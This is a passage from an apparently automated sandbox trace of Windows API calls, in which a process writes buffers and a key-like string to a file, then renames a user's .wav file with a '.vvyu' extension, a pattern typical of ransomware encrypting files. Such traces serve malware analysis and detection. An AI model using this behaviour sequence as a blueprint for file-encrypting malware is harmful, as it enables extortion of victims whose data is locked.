(HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0203.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0203.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0203.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0203.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37d0 [0203.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0203.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0203.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0203.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37a0 [0203.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0203.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3830 [0203.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0203.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3800 [0203.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37e8 [0203.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3848 [0203.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37e8 [0203.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0203.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0203.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0203.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37b8 [0203.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0203.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0203.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3848 | out: hHeap=0x620000) returned 1 [0203.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0203.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0203.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0203.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0203.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37b8 | out: hHeap=0x620000) returned 1 [0203.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0203.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0203.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0203.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0203.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0203.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0203.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0203.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0203.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37d0 | out: hHeap=0x620000) returned 1 [0203.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0203.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0203.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1f90 | out: hHeap=0x620000) returned 1 [0203.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0203.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0203.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0203.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0203.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0203.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0203.367] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x478e, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x478e, lpOverlapped=0x0) returned 1 [0203.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0203.368] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x4793, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.368] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0203.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0203.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0203.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0203.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0203.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.370] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0203.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0203.370] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.370] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0203.370] CloseHandle (hObject=0x510) returned 1 [0203.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0203.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0203.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0203.372] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\HbqLBzpGm.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\hbqlbzpgm.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\9AsT-P\\dKtSN5wkI\\HbqLBzpGm.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\9ast-p\\dktsn5wki\\hbqlbzpgm.wav.vvyu")) returned 1 [0203.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0203.373] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6eb88 | out: hHeap=0x620000) returned 1 [0203.377] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10822300, ftCreationTime.dwHighDateTime=0x1d89c15, ftLastAccessTime.dwLowDateTime=0x49f94ba0, ftLastAccessTime.dwHighDateTime=0x1d8a416, ftLastWriteTime.dwLowDateTime=0x49f94ba0, ftLastWriteTime.dwHighDateTime=0x1d8a416, nFileSizeHigh=0x0, nFileSizeLow=0x4793, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HbqLBzpGm.wav", cAlternateFileName="HBQLBZ~1.WAV")) returned 0 [0203.377] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0203.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0203.378] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0203.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0203.378] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0203.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0203.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0203.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 